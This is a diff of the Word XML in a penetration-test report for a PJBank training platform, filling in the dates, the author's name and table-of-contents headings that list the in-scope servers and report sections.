--- a/Project Report.docx
+++ b/Project Report.docx
@@ -420,9 +420,23 @@
                               <w:rPr>
                                 <w:color w:val="595959"/>
                                 <w:sz w:val="22"/>
-                                <w:highlight w:val="yellow"/>
                               </w:rPr>
-                              <w:t>Enter Date Here</w:t>
+                              <w:t>April 10</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:color w:val="595959"/>
+                                <w:sz w:val="22"/>
+                                <w:vertAlign w:val="superscript"/>
+                              </w:rPr>
+                              <w:t>th</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:color w:val="595959"/>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> 2022</w:t>
                             </w:r>
                             <w:r>
                               <w:rPr>
@@ -436,10 +450,26 @@
                               <w:rPr>
                                 <w:color w:val="595959"/>
                                 <w:sz w:val="22"/>
-                                <w:highlight w:val="yellow"/>
                               </w:rPr>
-                              <w:t>Enter Date Here</w:t>
+                              <w:t>April 12</w:t>
                             </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:color w:val="595959"/>
+                                <w:sz w:val="22"/>
+                                <w:vertAlign w:val="superscript"/>
+                              </w:rPr>
+                              <w:t>th</w:t>
+                            </w:r>
+                            <w:proofErr w:type="gramStart"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:color w:val="595959"/>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> 2022</w:t>
+                            </w:r>
+                            <w:proofErr w:type="gramEnd"/>
                           </w:p>
                         </w:txbxContent>
                       </wps:txbx>
@@ -497,9 +527,23 @@
                         <w:rPr>
                           <w:color w:val="595959"/>
                           <w:sz w:val="22"/>
-                          <w:highlight w:val="yellow"/>
                         </w:rPr>
-                        <w:t>Enter Date Here</w:t>
+                        <w:t>April 10</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:color w:val="595959"/>
+                          <w:sz w:val="22"/>
+                          <w:vertAlign w:val="superscript"/>
+                        </w:rPr>
+                        <w:t>th</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:color w:val="595959"/>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> 2022</w:t>
                       </w:r>
                       <w:r>
                         <w:rPr>
@@ -513,10 +557,26 @@
                         <w:rPr>
                           <w:color w:val="595959"/>
                           <w:sz w:val="22"/>
-                          <w:highlight w:val="yellow"/>
                         </w:rPr>
-                        <w:t>Enter Date Here</w:t>
+                        <w:t>April 12</w:t>
                       </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:color w:val="595959"/>
+                          <w:sz w:val="22"/>
+                          <w:vertAlign w:val="superscript"/>
+                        </w:rPr>
+                        <w:t>th</w:t>
+                      </w:r>
+                      <w:proofErr w:type="gramStart"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:color w:val="595959"/>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> 2022</w:t>
+                      </w:r>
+                      <w:proofErr w:type="gramEnd"/>
                     </w:p>
                   </w:txbxContent>
                 </v:textbox>
@@ -686,11 +746,11 @@
             <w:bookmarkEnd w:id="0"/>
             <w:r>
               <w:rPr>
-                <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
-                <w:sz w:val="96"/>
-                <w:szCs w:val="96"/>
-              </w:rPr>
-              <w:t>Template</w:t>
+                <w:b/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>Andrew Pham</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -736,7 +796,10 @@
               <w:tab w:val="right" w:pos="10790"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
           <w:r>
@@ -748,7 +811,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc67660169" w:history="1">
+          <w:hyperlink w:anchor="_Toc100619255" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -775,7 +838,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc67660169 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619255 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -813,10 +876,13 @@
               <w:tab w:val="right" w:pos="10790"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc67660170" w:history="1">
+          <w:hyperlink w:anchor="_Toc100619256" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -843,7 +909,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc67660170 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619256 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -881,16 +947,19 @@
               <w:tab w:val="right" w:pos="10790"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc67660171" w:history="1">
+          <w:hyperlink w:anchor="_Toc100619257" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Scope</w:t>
+              <w:t>The PJBank CISO authorized the development of a cybersecurity training program to improve their network security posture. PJ professional IT services has been contracted to test the new training program platform for security weaknesses.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -911,7 +980,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc67660171 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619257 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -949,16 +1018,19 @@
               <w:tab w:val="right" w:pos="10790"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc67660172" w:history="1">
+          <w:hyperlink w:anchor="_Toc100619258" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Risk Analysis</w:t>
+              <w:t>Scope</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -979,7 +1051,359 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc67660172 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619258 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="660"/>
+              <w:tab w:val="right" w:pos="10790"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc100619259" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>1.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>The Debian server in the DMZ (DMZIServer | 10.1.0.7)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619259 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="660"/>
+              <w:tab w:val="right" w:pos="10790"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc100619260" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>2.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>A web Application Server in the DMZ (Debianx64DMZOnCloudNew | 10.1.0.12)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619260 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="660"/>
+              <w:tab w:val="right" w:pos="10790"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc100619261" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>3.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>The Internal Network Device (employee workstation) in the MZ (Win-10 | 10.1.2.4)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619261 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="660"/>
+              <w:tab w:val="right" w:pos="10790"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc100619262" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>4.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>A public web server "Learn About Security" (Learnaboutsecurity.com)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619262 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1017,15 +1441,89 @@
               <w:tab w:val="right" w:pos="10790"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc67660173" w:history="1">
+          <w:hyperlink w:anchor="_Toc100619263" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
+              <w:t>Risk Analysis</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619263 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="10790"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc100619264" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
               <w:t>Recommendations</w:t>
             </w:r>
             <w:r>
@@ -1047,7 +1545,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc67660173 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619264 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1085,10 +1583,13 @@
               <w:tab w:val="right" w:pos="10790"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc67660174" w:history="1">
+          <w:hyperlink w:anchor="_Toc100619265" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1115,7 +1616,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc67660174 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619265 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1135,7 +1636,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>4</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1153,10 +1654,13 @@
               <w:tab w:val="right" w:pos="10790"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc67660175" w:history="1">
+          <w:hyperlink w:anchor="_Toc100619266" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1183,7 +1687,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc67660175 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619266 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1203,7 +1707,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>4</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1221,15 +1725,89 @@
               <w:tab w:val="right" w:pos="10790"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc67660176" w:history="1">
+          <w:hyperlink w:anchor="_Toc100619267" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
+              <w:t>Medium Risk Vulnerabilities</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619267 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="10790"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc100619268" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
               <w:t>Significant Vulnerability Details</w:t>
             </w:r>
             <w:r>
@@ -1251,7 +1829,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc67660176 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619268 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1271,7 +1849,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>4</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1289,10 +1867,13 @@
               <w:tab w:val="right" w:pos="10790"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc67660177" w:history="1">
+          <w:hyperlink w:anchor="_Toc100619269" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1319,7 +1900,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc67660177 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619269 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1339,7 +1920,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1357,10 +1938,13 @@
               <w:tab w:val="right" w:pos="10790"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc67660178" w:history="1">
+          <w:hyperlink w:anchor="_Toc100619270" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1387,7 +1971,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc67660178 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619270 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1407,7 +1991,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1425,10 +2009,13 @@
               <w:tab w:val="right" w:pos="10790"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc67660179" w:history="1">
+          <w:hyperlink w:anchor="_Toc100619271" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1455,7 +2042,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc67660179 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619271 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1475,7 +2062,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1493,10 +2080,13 @@
               <w:tab w:val="right" w:pos="10790"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc67660180" w:history="1">
+          <w:hyperlink w:anchor="_Toc100619272" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1523,7 +2113,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
